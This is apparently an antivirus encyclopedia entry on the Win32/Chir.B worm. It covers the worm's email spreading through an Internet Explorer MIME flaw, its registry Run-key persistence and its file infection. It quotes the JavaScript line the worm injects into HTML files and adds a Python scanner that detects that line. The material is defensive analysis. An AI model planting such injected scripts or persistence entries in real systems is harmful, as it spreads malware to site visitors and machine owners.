Threat Encyclopedia


Win32/Chir.B

Alias: I-Worm.Runonce

Win32/Chir.B is a worm that spreads as an email file attachment. It also has the ability of a classical virus to attack executable and HTML files. The worm is 10748 bytes in size. It attacks computers running the Windows 9x/ME/NT/2000/XP operating systems.

To spread via email, Win32/Chir.B exploits the incorrect MIME header vulnerability in Microsoft Internet Explorer 5.01 and Microsoft Internet Explorer 5.5, which allows the executable attachment to run automatically without the user double-clicking on it. The vulnerability description is available at www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp. A patch securing against this vulnerability, known since March 2001, is available for download at www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-027.asp. Since a number of known worms use this vulnerability to spread, it is very important to download and install the related patch.

Note: In the following text the symbolic name %windir% is used in place of the directory in which the Windows operating system is installed, since this may differ from installation to installation.

The worm arrives as an email attachment named pp.exe. The message appears to come from imissyou@btamail.net.cn or addressee_name@yahoo.com; Win32/Chir.B replaces the string addressee_name with the real name of the addressee who receives the copy of the worm. The subject of the message carrying the worm is "addressee_name is comming!". When the file is executed the worm is activated and copies itself to %windir%/System/runonxe.exe. The hidden, system and read-only attributes are set on this newly created file. To ensure that this copy is activated after the system reboots, the worm creates the entry Runonce under the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and sets its value to "C:\WINDOWS\SYSTEM\runouce.exe".

The worm sends copies of itself to addresses found in the Windows Address Book or in files with the extensions .wab, .adc, .doc and .xls. It can also harvest addresses from files whose names end with the string r.db.

Win32/Chir.B infects files with the extensions .exe or .src, but it does not infect files in folders whose names match the pattern "wind*" or "winnt*". It also searches both local and network drives for files with the extension .htm or .html and adds the following code to each such file:

<html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>

This line opens the file readme.eml, 14336 bytes in size, which the worm creates in the same directory as the infected HTML file.
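As an added defender-side example (not part of the ESET entry), the following Python scans a directory tree for .htm/.html files carrying the appended script quoted above and checks for the companion readme.eml; the sample tree it builds in demo() is constructed here for illustration.

```python
import re
import tempfile
from pathlib import Path

# The one-line script Win32/Chir.B adds to .htm/.html files, as quoted in the entry;
# whitespace between tokens is tolerated, the call and its arguments are not.
CHIR_B_HTML_MARKER = re.compile(
    r'window\.open\(\s*"readme\.eml"\s*,\s*null\s*,\s*"resizable=no,top=6000,left=6000"\s*\)',
    re.IGNORECASE,
)
DROPPED_EML_NAME = "readme.eml"
DROPPED_EML_SIZE = 14336  # bytes, size of readme.eml given in the description


def html_carries_chir_b_marker(html_text: str) -> bool:
    """True if the HTML text contains the script line the worm adds."""
    return CHIR_B_HTML_MARKER.search(html_text) is not None


def scan_tree(root) -> list:
    """Walk root; return one finding per .htm/.html file carrying the marker.

    Each finding records whether the companion readme.eml sits beside the
    file and whether its size matches the 14336 bytes the description gives.
    """
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in (".htm", ".html"):
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        if not html_carries_chir_b_marker(text):
            continue
        eml = path.parent / DROPPED_EML_NAME
        findings.append({
            "file": path.relative_to(root).as_posix(),
            "eml_present": eml.is_file(),
            "eml_size_matches": eml.is_file() and eml.stat().st_size == DROPPED_EML_SIZE,
        })
    return findings


def demo() -> list:
    """Constructed sample tree: a clean page, an infected page with a readme.eml
    padded to 14336 bytes, and an infected page whose readme.eml is missing."""
    root = Path(tempfile.mkdtemp())
    appended = ('<html><script language="JavaScript">window.open("readme.eml", null,'
                '"resizable=no,top=6000,left=6000")</script></html>')
    (root / "clean.html").write_text("<html><body>nothing to see</body></html>")
    (root / "a").mkdir()
    (root / "a" / "index.htm").write_text("<html><body>hello</body></html>" + appended)
    (root / "a" / DROPPED_EML_NAME).write_bytes(b"X" * DROPPED_EML_SIZE)
    (root / "b").mkdir()
    (root / "b" / "page.html").write_text("<p>x</p>" + appended)
    return scan_tree(root)
```

A finding with eml_present false still matters: the HTML modification alone indicates the worm ran on a host with write access to that share.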

© 1992-2004 Eset s.r.o. All rights reserved. No part of this encyclopedia may be reproduced, transmitted or used in any other way in any other form or by any means without prior permission from Eset.